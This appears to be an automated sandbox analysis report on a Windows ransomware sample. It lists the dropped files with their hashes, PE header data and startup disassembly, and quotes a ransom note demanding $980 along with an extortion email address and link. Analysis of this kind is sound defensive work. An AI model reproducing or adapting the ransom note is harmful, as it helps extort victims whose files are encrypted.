                              SHA1:9045C90F4738C818C461147C82178F6B4AFA85E7
                              SHA-256:2457BEA37FF4F8D8DCEF819F6B6B5524A6E09D51C45FC44983E9342C74AA5922
                              SHA-512:6DC0817797F9CE71541AF76D2BD456EB2F4EAAC7B44A310FFF0356CA216263C45D69A68D0C94F32A1E2EA1E194844D3229158BE256E220B6B418185C2A242369
                              Malicious:false
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):260578
                              Entropy (8bit):6.929408419888144
                              Encrypted:false
                              SSDEEP:6144:tKzTSr0IRN7FNzNiUeFvX71FnGifcBH6c6Y5iuHokyF/MjicF3ZofQNnXJQbfYe3:QTSQwlzzIxFOR5iuHokyF/MjicF3ZofR
                              MD5:3BE2D7F2D8EA72AEBCEB3C3DF11123E8
                              SHA1:4089005D8D3E698761900B14F2A84CA672806010
                              SHA-256:523E748DCB410130D4205EDC4DA10D24A99BFA5BF2A726C57C1F9C1A66507ED5
                              SHA-512:BC53013F9D6EC77A0D4AFAC0AA1D7020E4820818754EC91ED95FA943C33E85DC3E4592DDBB77B8B6839D517DB541503B625DE42A7A03E4E0321DED4EE77FC481
                              Malicious:false
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):217610
                              Entropy (8bit):7.290424805175512
                              Encrypted:false
                              SSDEEP:6144:L7adlLlLCE9OzX0+f6rvr+GQ3EtFpE4F1K8YD7cL1EPL+9dzfVjGBB659Q0512q8:LOvLlzAzXurvCx3EtFpE4F1K8YD7cL1A
                              MD5:33B28D84E638112CCBACF379F64EAA7D
                              SHA1:00C1D87D4425579795810F8964853C48E6860024
                              SHA-256:3B88BCC3D88D9CA63FFBE400B14986C1450058BD8769F0BA8327B9752FC5725C
                              SHA-512:9E2E0DB4BCF63A0A49F3B3E354D80090EBFE1548E4C9951158D00F16B710728191E7241E251EC4F63C888CA8D64D263006F9955F850AA65CBE03C833F70D4AB3
                              Malicious:false
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):393546
                              Entropy (8bit):6.116035349299919
                              Encrypted:false
                              SSDEEP:6144:iXv75m5/d5Kzddzktau6xAJzSZ/JQYqCqVRcWXTGQ3x:iXvgJdkzddzk8CzrzTx3x
                              MD5:8E77C82218ACB096AAA6F43A6DCB8468
                              SHA1:72549332AB6F65875834D86E7267256857C49BA3
                              SHA-256:0724C04B969CFCFC50047DB5A6F6F1B886AC2E59475227BB82918B243F3224D4
                              SHA-512:F173FD9C1B3DD93F993D45A33F4EDC751D8526C75B094D29C91F5677F6D63A8B8CEC2A67327059FAF272242810DD0A202BFB17C0600526359CDFB0F7739ED9B6
                              Malicious:false
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):24210
                              Entropy (8bit):7.992751844881975
                              Encrypted:true
                              SSDEEP:384:PrzhtIrTFW7y1nVNrtZF9N3iLXmN7oJ6/5xZYowfvUUAeGNJTl/wvZjk4pd:Pr0r5ky1nVrPHNn5x4fvUB5/2Zjk4pd
                              MD5:472961A64E25ED879D5AA95BD41BF8D1
                              SHA1:76814CEF315215715CC5CC9535F9D5C59DCD5FF8
                              SHA-256:21ED6289DE0AF127D1E1257457180F65AB5CE64C3C0F99E856F35229EDC22818
                              SHA-512:9AD05A25386C45726ED363A9AF69502686FE1B41F8FCC93B39A28716C1EFB27C379BB8D0A7C5DFB9965191AE809A06CA9C638CE93251C5ED5C1C188ECEE69665
                              Malicious:true
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS-DOS executable, MZ for MS-DOS
                              Category:dropped
                              Size (bytes):141134
                              Entropy (8bit):7.998456755247007
                              Encrypted:true
                              SSDEEP:3072:3i1OHAFveYkPWw6PIzSn50jbBkLyUVAmdJ0k+M1zGTohGKjy:sgAFv7kPZ6wzS5MbBaimnnGkUKjy
                              MD5:AFFD64D5261A46E6B5CD7D4416D92F76
                              SHA1:85EAE13C670B52ABAE9C561AABDF514C09739D2B
                              SHA-256:1FE146195DF0F48A92699B1600C1AF27F44BEBCB1FC5327706C6EB949D330278
                              SHA-512:048EF67AE9DDAC892B5F2D11FB03C600C3E59EE0FBEFC45E5BC541879899C9CDB5D74391ED5095BFBDEEC774638DD436D71FCB763F9A2B6770D8D2FFF28534F0
                              Malicious:true
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):6256
                              Entropy (8bit):7.972702228374289
                              Encrypted:false
                              SSDEEP:192:Vr8w2Meik7GHG5qvpFHBP+WCjz1y1Z2736p/0f:Vgw933THBPJC3mgo2
                              MD5:6E5897E88CDE844147C7B506C0D984CC
                              SHA1:127B76175F4DB9E6B73B7080BC13717CB75E131C
                              SHA-256:2F049CA4E6EE099FC641967221C04F9FAC9ADC37A69BACC0E82614F498FB88EE
                              SHA-512:7D1A36F532DA7229245D60F64E881BD98FD0F2EF969397DA2EDACF419A7E18D39D71C381CA213159588DED0650E58E225DBAFA8A9AF6B032B83C4911EB8A9740
                              Malicious:false
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1639
                              Entropy (8bit):7.885727318780146
                              Encrypted:false
                              SSDEEP:48:YS9BocpCXvLYYLtBNZeqxBNYaw/FNCZSoOItjZhD:z9BGfLrBF36N2NtjZJ
                              MD5:CEE82B8F9CE85FB4364A0FD5CCD768D3
                              SHA1:84D56BEF98E91396D41A37668C788CC66931585D
                              SHA-256:1FD6B57B8BC11FD7A691E8339CF2BA490D6B9006CA280FBCAC3E4F2375CBE17C
                              SHA-512:8973CAC7F05718FFAE37B4409E4186BE442F66254CF0EBB862D6D9691049C4865CE4B48408558A92BF247492687847872FAEDB0E2BA7081439C7EA87FAB36D62
                              Malicious:false
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):602502
                              Entropy (8bit):3.175165631545664
                              Encrypted:false
                              SSDEEP:3072:EUNrGcf57Dv5VQgtkbt7oTboCGUcDnBR8z4OG0FvunCRbmYPt:E+zftBTy7oTbPGUbXvun1Y1
                              MD5:B7242B3E0CAE0DE10632375997DA0912
                              SHA1:15E3AD6E47BAD08A649168238D132DF53DFF1D64
                              SHA-256:A3B94358F2207E8A3E00E35298E091DFB1104FBE4CED3FEB99AFE5C25CDF708B
                              SHA-512:5E2635BADFA28C707249DEE73891C5A33A2C83E20E429ABA620B8317023C9B8BCD6AA843773AEBCCAF072980F20386341D55D1154A7734BF8C4D76F09AAF5DAF
                              Malicious:false
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):602502
                              Entropy (8bit):3.1750242119478207
                              Encrypted:false
                              SSDEEP:3072:69e3rfrRJh08drUnxQrhYpCzg57EoG/O4Vml4wWmh8GcYJUJLco15AkmBp:T3TrRQ8JAxQrzkqoGW4QJh8PLcG5ATp
                              MD5:0DEC6C8A8678AE0834C414089EFAB2F3
                              SHA1:7B4ABCC8D56BFED0FDB4F9F69A2CEC7C9F3B0373
                              SHA-256:60A2F408C0B97C5458BDA4AE849C43533F27D7C3EEE34398C8E5B1FB51267EB8
                              SHA-512:64E3EE319AC98608CE7686A1BC8E628181E7D899241A58FD3A33B0F685D84DDE240C3FE5F0AFC42F2A987C3B5402CCC16B681E81CB8E2D513F16A616F9BEEAA9
                              Malicious:false
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):34065
                              Entropy (8bit):7.994962880069683
                              Encrypted:true
                              SSDEEP:768:jO3Q64OdrXAc8cXNXAuJ/oQMSXah7F5T5XBO5+x5iptc6BYmb:EQ64dKwuhlaBn8+utc6BYmb
                              MD5:FFF600350B65F87BA68447C8F49E6946
                              SHA1:C608DA95CC9D1B853DDD4E495002F26EF6A9C708
                              SHA-256:F955B301FC90A1EC43E846AA556E133270285546FD598C35E2CBC3A91F9C23D4
                              SHA-512:D0C01A4473F6EE76BAE249CB5C1013B34A521E8E7C3C9ED465A69B78FE8E429002D7F0BD4F7305B278A6D96C4C90B22C5858798B2BC354805C49672F22BD159B
                              Malicious:true
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):12129
                              Entropy (8bit):7.984445706031316
                              Encrypted:false
                              SSDEEP:192:7zfYar8J/1hLpigsI+tk2gFFuUN9DbC2yag5wJ9hV0Aejcf2Zz/aLS/51iq8jyHY:35r8h1h1rsI+tyv1F+KYwJmrjjz/aO2Z
                              MD5:3B2EDD2FEA24AC78BE25E96A6A7C32C2
                              SHA1:084073861B01C2E4BA38E954894EDAF26A264090
                              SHA-256:6922CE0544B4A30461D26A50093DA21171926E0E9A1CF9384F67E7288EBE26A9
                              SHA-512:8394997F32BD3AD5C6B2538BEFF25D295C786AAE9424DF8C6F813C6F6E8CE4644924040F43DEE776A5319C3B9CD26BDA34ADDA1FFF02450FBF7E5A63C4FDC9C4
                              Malicious:false
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):66542
                              Entropy (8bit):7.997046545697589
                              Encrypted:true
                              SSDEEP:1536:p7mo6uAMe8pXmKv5/czdi7T8nVX4U6pmCrhx+PXcjC8X:tXNe8pXxv50u4VoJRhx+P7e
                              MD5:32885AFCC6883B4B35EA4DFFB407D438
                              SHA1:32D8FDF95FE81F7B37F055D3B41D7445A54A6FE0
                              SHA-256:F6081A93AA79362D6F7840758CBF615D00B82ED61D70C090881C32E5150C9617
                              SHA-512:817234444629167A3512B2475F73D2935054ECD053DB275FC18CBA87C5AC51AF784AAC088D79FF8B447C9A8596D9B0FEA3DB2AE77991F99B16661DF8F7D89455
                              Malicious:true
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1045
                              Entropy (8bit):7.771191368391132
                              Encrypted:false
                              SSDEEP:24:yFI/KxXsOAmUiSQiUMc18gqCeEeX0rO2uN0XkSRtnZxbD:yq/N7mUiSkMc18gq7iuOXr3ZhD
                              MD5:379697B035B5DE363873F77D1360B1ED
                              SHA1:61E70C001CDA8F165AC2BD3DB249A6D4BE09D71F
                              SHA-256:63F6917B68D1F71D5E0738C1BC0DA3994CC98826AACECF9BB0A03E2D27070883
                              SHA-512:8D3071B0CC2F134351D391E066BE6B6CC24DF84A47342300DAF452B915FA75320BE40DB28E7471F559930887651C259289BEF2945031C133AD0D45E3ECC06FFC
                              Malicious:false
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):662029
                              Entropy (8bit):6.821835076484915
                              Encrypted:false
                              SSDEEP:6144:hzxKkxb1L6eiEP1RhyRcdn94ofjGTxSBYCnyTRgbi9cnipVHaeuFM7U5StsRmDSA:hzxKkxb1RiEPXqo94omEfr4cnSg0B
                              MD5:9BF08148C6993D35DE1E77A5271AB56B
                              SHA1:EC2037D4415D50D7044BDEF9F48B08BADCB0E34B
                              SHA-256:7A21401DB0306290602B68351CAD9E30C7360D595929070108B79291E6CB79B4
                              SHA-512:0FD0A2D7606FEABD614C9E4C267E585172158880F7F301454EA6EC742119E88BE21B9E9E048FC535B44ADC487D76CBA8B134A7D77F1A2CAC09BF6AB63B865DC0
                              Malicious:false
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):193321
                              Entropy (8bit):7.8709443326082065
                              Encrypted:false
                              SSDEEP:3072:Kjg76MTx2CXZBDs9nNWMe0xlpqcjmEd2SYA3OTnCIUV+MI6v7G1rElDbJ43w8O:KEzTxHDQhl0K2SYNC3+MxwW8O
                              MD5:042F9FE346656DD980568EED4A874F06
                              SHA1:F080967CE139DCF4E887147EFCEF7B442911745F
                              SHA-256:E5CE9D0D9E2F48C9BF457B73D5A36CDF8332A4FF345ECBF0C0A660F6732523DD
                              SHA-512:CCCE724DF8E114BFA0EB5C81895E55FCAA8D94285A94A10542CDDDF384252592EAE04A90EB2975174EF9E25640B4F1D03B1268F30B5BFA24A715FCE54AEBF80A
                              Malicious:false
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):240221
                              Entropy (8bit):7.547694684178147
                              Encrypted:false
                              SSDEEP:6144:N+L8aZ97Zphp84WmZPQfVq7XOIQdoVBkuCXQJ51VcaN6ES:Y8UL/p841ZIts+IocBkt4a
                              MD5:9A5CB2BFBE6C739135D163405F819C4D
                              SHA1:174FEEC30934824FF12EAC1E3577597BB0A73F3B
                              SHA-256:BC8B460FFB77C1D76DA635FACBE86B622827DEBCB133880CD6DF56E039C3C083
                              SHA-512:35AF98644D1E1F4E83E1ECBE074AAA6E4C2CBA931C40EEDA2B49882566D1FDF25E70AF94541EFD80204C6E6856FFD00021662BC6AC9FAD75E5FA3B04311BA1C8
                              Malicious:false
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS-DOS executable, MZ for MS-DOS
                              Category:dropped
                              Size (bytes):821070
                              Entropy (8bit):7.886293676058312
                              Encrypted:false
                              SSDEEP:24576:IX1rZeTc0oA5snjj0ZvgCxwaEbNHzy9XSm3XNEGQnAU:IFr50oOoEwaONQXHNEGev
                              MD5:D4F2AD4C13949D35F4E74AB9BC148A01
                              SHA1:F1993666CABCB0285338FEB36C35AD8A13A6BE1B
                              SHA-256:8C1B08B0728CEB4B1A72549A35880C878839822C1AC626C29E11FE0D029FC151
                              SHA-512:7827B7B1D6A36928AFF2EFDFF40D3BB5EE7E3AF823FCA46CE3F4F877A72DED11D52DD2DF27D7137E1EE74C327D6C956C29EE5F1CA9AA0EBCCDBED1AC8507A1A7
                              Malicious:true
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65188
                              Entropy (8bit):7.996920793451851
                              Encrypted:true
                              SSDEEP:1536:L445MKy6RUfXfQpTg4D8bKnNRvdCgyLVNPgpbFdiVi5bX+2gewY:L4b66Pf+TgEBnN2VLfv8xg9Y
                              MD5:1CA612D6BE43DD3A3102A97C0E7799BD
                              SHA1:E5CD94C3CD1650940AEF6C006C42B789F2989ABE
                              SHA-256:AC1346BA3FE4E0F5FB7AD5A707001DDDC85F5F08CA89E03E913D527EF88641BE
                              SHA-512:B52D543556CF40396961A93D53DA6EE9E6DB2D35DE8252BB6D69AF5E81EDFC43A3BF8C87C6FC5A0F005C5D111D9353AFE44D6A6B1ECB270812C1D32715408C2C
                              Malicious:true
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS-DOS executable, MZ for MS-DOS
                              Category:dropped
                              Size (bytes):42164934
                              Entropy (8bit):7.947663330735503
                              Encrypted:false
                              SSDEEP:786432:zwQNeYDxVRrMPJy7LVV4NDDmdrZy9wOtg5gGOdjtjSNu4GIluUNj56I59N:sQcWxDMPnN+dk65gGUjku4vNjLjN
                              MD5:B929A21F4C0672C4AD2EAB1743D47E4A
                              SHA1:1B6240F9DA0C44FFE5FFC32E62AD37E8E0939A8A
                              SHA-256:50F8E34732F4354E54DEBC239435F1A72C1B9D9A6B086CFDFD3EFDFDB47AEF7A
                              SHA-512:DFCD1CD9730A1D4C7903646F2EECCCB2D60150F969AA4494EE6334D45E73532739F7448BC776F9A742D979FA6A405428002C23ED581883F1D6A890CD608E38C7
                              Malicious:true
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65188
                              Entropy (8bit):7.997271230616298
                              Encrypted:true
                              SSDEEP:1536:l9sMPhFbbPUpGtofy5Mp10ACkQIP3T4EdYQCMstE6VIlHR:rhtcGtofvhCkQUv+QJs6kIlx
                              MD5:FB333EDADB999E72263EB3DD01311EBB
                              SHA1:73FA8E19F656EF0D3186036D4B1BA8E5605DF1FD
                              SHA-256:9544CD06ABA55B8781CCC2054F05D9984C503794642D2158C34E4B578467A27B
                              SHA-512:22AEB23721BE687E9738091E72C1B2EA829A1395D2866CF1CF403E6A1C9284416F68A55E5CD3E05D719BFDD7FBF5E52207DB0E89DACA34129F4F8B3B5047AE58
                              Malicious:true
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65188
                              Entropy (8bit):7.997492340565547
                              Encrypted:true
                              SSDEEP:1536:zfPrXZBUu2AzpwVawDdg7lp2uk3jY19+7mAdP9Rj7eWEO97tvqT:zrJBbyVaw44/jY1c7P916WEO9he
                              MD5:6E32B04768E885811E9D7CC5987F7991
                              SHA1:34EEF8FE4A902FBC23A2D487D53C35FD5EFCC33E
                              SHA-256:E4FDAA18F30616951FC96ACD7B177480DECCEB3E5A9A152206E23B49982859BD
                              SHA-512:8160A5D3E3E11F9907660534DA6A8339D4791A64382CD0709328395BF236C25EC5D6E0ADDC4B07F0C882D1ACDF2518203828B72168B2571FC0103AE27C80A897
                              Malicious:true
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):74526
                              Entropy (8bit):7.997636044978161
                              Encrypted:true
                              SSDEEP:1536:ku5T2d40F+Q8WX99qQIh3z1qPwDzWj9HhGW9A:m40yWt9ozpzWj9HhG2A
                              MD5:9327D998894A2469CD976793B17B71EA
                              SHA1:20A4DF1D178CFD3E25C6F3C50C83BDDBDA93A860
                              SHA-256:8084DA50C56A68E231EE0001528F0957860C5D22EBE1D2F3E8A0048FC20B76C4
                              SHA-512:95721E91D7C48D252A5BD7555A70210628C38599D0958481D68B595F277A11A4580C29492131E14EC2B8909DE1C5697BD9ACABA53D32F976B2FFB4EF7AAD33A4
                              Malicious:true
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1031
                              Entropy (8bit):7.780974267425593
                              Encrypted:false
                              SSDEEP:24:t68jgs/TMQWZiGo6q7yo0zE+7kx7UkUWRpj9ptnZxbD:B7M1wGopg7QRUkUMpjfVZhD
                              MD5:F5F2810746AABB9D2F3D5BEEC04432C5
                              SHA1:2DF730CB40B390203C6DE8D989235B37CA84C1CA
                              SHA-256:C23D8DAF8DB8071D8A68E43A2989B06F700CA9462FC0010464364558DD7E490E
                              SHA-512:EABC6C4EC7096528A64006E6AD4C79BF579BC874D3750BCD0E1D6CFB84DCD19EB4D0FE9BDD264B63392590C61DCF45E161BF96C2AAC702B2023A555C6EC0AABF
                              Malicious:false
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1193
                              Entropy (8bit):7.81570139095227
                              Encrypted:false
                              SSDEEP:24:WpQvhNqbII7Cy2ixJ5RAiov3kmkdrmJRTYLnZxbD:WpQpUIBi35RJ0km9J6ZhD
                              MD5:5D25DE79615686DAA109ADAD095C377A
                              SHA1:F214B09A9264552A60A7191BFB495BE31D1B2592
                              SHA-256:E491AA5CF7D35258933E3413F3B5053B27F47C9871F901BFDD135628035256ED
                              SHA-512:DFA33E66BB0EBB2D199517133BDE5FEF484FA82095B33897B116AEFB1F465AD10BC2A091AA01BA750E4774D9555CCB9DF927C88DB085C9E522C5B8BB73FAD3FA
                              Malicious:false
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1193
                              Entropy (8bit):7.81570139095227
                              Encrypted:false
                              SSDEEP:24:WpQvhNqbII7Cy2ixJ5RAiov3kmkdrmJRTYLnZxbD:WpQpUIBi35RJ0km9J6ZhD
                              MD5:5D25DE79615686DAA109ADAD095C377A
                              SHA1:F214B09A9264552A60A7191BFB495BE31D1B2592
                              SHA-256:E491AA5CF7D35258933E3413F3B5053B27F47C9871F901BFDD135628035256ED
                              SHA-512:DFA33E66BB0EBB2D199517133BDE5FEF484FA82095B33897B116AEFB1F465AD10BC2A091AA01BA750E4774D9555CCB9DF927C88DB085C9E522C5B8BB73FAD3FA
                              Malicious:false
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1383
                              Entropy (8bit):7.855471927620737
                              Encrypted:false
                              SSDEEP:24:Le1WciyQxw9SS9nLMbRnDWPLEXu2zqMOTrwn0xxzjBCHURkF+S+D+tSBLv+dbZpf:LeE1AtSZD0Lodz6kWPB8UaFLEmdPZhD
                              MD5:B4ED2A86E87E642181592512EFD42662
                              SHA1:AD6A695D7A88795D52C9C5F55B3DEA267D179A8A
                              SHA-256:BDF878DC6A39429FE6AA3E44253BD3F9E6A865218E1290043DE04D82D47D5AC4
                              SHA-512:4C97753848B4F65ED48EF8B89724BA7CE1D62CCE8D2572AAD88CA666FBF804E492B1AA47FC095214A281E3477470D2C6A5748B1FC16BA80BD79F5BD9F8509C76
                              Malicious:false
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):341
                              Entropy (8bit):7.341368857104536
                              Encrypted:false
                              SSDEEP:6:REKq8W7i3oiG32c9QFEHerFs3PI3WPtexNhOtxiYUcgBDDxnZcWcii96Z:6Io1J9QFyerCA3WP2hODiYUZDtnZxciD
                              MD5:119F35E8CBE62CA0C4A9B5FA21AA3283
                              SHA1:F19DBA9F08C47E93C118917DDA889FE7E3772786
                              SHA-256:57ACF7E2ED2F94A7716364DFFB8461778F7AD11598E75BDD4DCC7DDAC7237742
                              SHA-512:3E4A662078715BFE9D15102E53CC04AC0617FAAEA16451D22D6DD0C4AA58B1E06BE6E1BF021314D4389E8B2CFF7823EE42FB5124EB8639CAA4448F6FB63C3677
                              Malicious:false
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1104
                              Entropy (8bit):4.893245966380744
                              Encrypted:false
                              SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYLuWs7mFRqrl3W4kA+GT/kF5M2/kh7HFJhtnZd:WZHfv0p6WsPFWrDGT0f/kRFNZd
                              MD5:6769456FD1CE9C5E1B30A7C4B3D6BC0C
                              SHA1:6B2A667A27CC056CE90AD156B2A71DA4D71A1496
                              SHA-256:92C03AFD5BFE65DB7A98A764CB662B87F1B3D6B3FA1B6CA92A1C92B9725135F0
                              SHA-512:A164F6E0D38B4F54829912E10F7EE66818A9028801B5902B707AC734F111A395F7F35485295497251FBE2E978BBA38556B742178EF7FF68C09D2B822E9BCDA48
                              Malicious:true
                              Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-TVrnNufMGq..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..helpteam@mail.ch....Reserve e-mail address to co
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1104
                              Entropy (8bit):4.893245966380744
                              Encrypted:false
                              SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYLuWs7mFRqrl3W4kA+GT/kF5M2/kh7HFJhtnZd:WZHfv0p6WsPFWrDGT0f/kRFNZd
                              MD5:6769456FD1CE9C5E1B30A7C4B3D6BC0C
                              SHA1:6B2A667A27CC056CE90AD156B2A71DA4D71A1496
                              SHA-256:92C03AFD5BFE65DB7A98A764CB662B87F1B3D6B3FA1B6CA92A1C92B9725135F0
                              SHA-512:A164F6E0D38B4F54829912E10F7EE66818A9028801B5902B707AC734F111A395F7F35485295497251FBE2E978BBA38556B742178EF7FF68C09D2B822E9BCDA48
                              Malicious:true
                              Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-TVrnNufMGq..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..helpteam@mail.ch....Reserve e-mail address to co
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.699993100423124
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.55%
                              • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:tsnsd8pOvn.exe
                              File size:820'736 bytes
                              MD5:04e42207db45792cae0f6d3fd83f0680
                              SHA1:cb17f3a1bb57541204afd27313b390e5ead5096c
                              SHA256:b377b7b8211e454117ba3d6cd6bb1ac84c0105c8647187cb5cf19ad50c9d26b9
                              SHA512:b81da4e8961bc8c25e6832db5c1227cb253e178e6c5a4db0725ed073639d944b8d8012865ace42b2781b3f09b082e44a8a19c2ee326a173acb8757caebacbbf7
                              SSDEEP:24576:7oL6YwH+hUfoA5snjj0ZvgCxwaEbNHzy9XSm3XNEGQnA:cL6Yw2UfoOoEwaONQXHNEGe
                              TLSH:9305F130AAA0C034E5B715F04CBF83B8B53D7EA19B6490FB61D56EEA16346E49C31B47
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........L.p...p...p..."4..p...""..p..."%..p.......p...p...p..."+..p..."5..p..."0..p..Rich.p..........PE..L......^...................
                              Icon Hash:251b7a64b1051111
                              Entrypoint:0x402020
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:TERMINAL_SERVER_AWARE
                              Time Stamp:0x5E9B9481 [Sun Apr 19 00:00:01 2020 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:0
                              File Version Major:5
                              File Version Minor:0
                              Subsystem Version Major:5
                              Subsystem Version Minor:0
                              Import Hash:a09ba88638e365d2730477a4bfd803f0
                              Instruction
                              mov edi, edi
                              push ebp
                              mov ebp, esp
                              call 00007FBD11012B7Bh
                              call 00007FBD11008A96h
                              pop ebp
                              ret
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              mov edi, edi
                              push ebp
                              mov ebp, esp
                              push FFFFFFFEh
                              push 004272C0h
                              push 00407450h
                              mov eax, dword ptr fs:[00000000h]
                              push eax
                              add esp, FFFFFF94h
                              push ebx
                              push esi
                              push edi
                              mov eax, dword ptr [00429A60h]
                              xor dword ptr [ebp-08h], eax
                              xor eax, ebp
                              push eax
                              lea eax, dword ptr [ebp-10h]
                              mov dword ptr fs:[00000000h], eax
                              mov dword ptr [ebp-18h], esp
                              mov dword ptr [ebp-70h], 00000000h
                              mov dword ptr [ebp-04h], 00000000h
                              lea eax, dword ptr [ebp-60h]
                              push eax
                              call dword ptr [00420154h]
                              mov dword ptr [ebp-04h], FFFFFFFEh
                              jmp 00007FBD11008AA8h
                              mov eax, 00000001h
                              ret
                              mov esp, dword ptr [ebp-18h]
                              mov dword ptr [ebp-78h], 000000FFh
                              mov dword ptr [ebp-04h], FFFFFFFEh
                              mov eax, dword ptr [ebp-78h]
                              jmp 00007FBD11008BD7h
                              mov dword ptr [ebp-04h], FFFFFFFEh
                              call 00007FBD11008C14h
                              mov dword ptr [ebp-6Ch], eax
                              push 00000001h
                              call 00007FBD110140BAh
                              add esp, 04h
                              test eax, eax
                              jne 00007FBD11008A8Ch
                              push 0000001Ch
                              call 00007FBD11008BCCh
                              add esp, 04h
                              call 00007FBD1100D0B4h
                              test eax, eax
                              jne 00007FBD11008A8Ch
                              push 00000010h
                              Programming Language:
                              • [ASM] VS2008 build 21022
                              • [ C ] VS2008 build 21022
                              • [C++] VS2008 build 21022
                              • [IMP] VS2005 build 50727
                              • [RES] VS2008 build 21022
                              • [LNK] VS2008 build 21022
                              Name                                  Virtual Address  Virtual Size  Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT          0x279f8          0x3c          .rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE        0xce000          0xae78        .rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_DEBUG           0x202a0          0x1c          .rdata
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                              IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
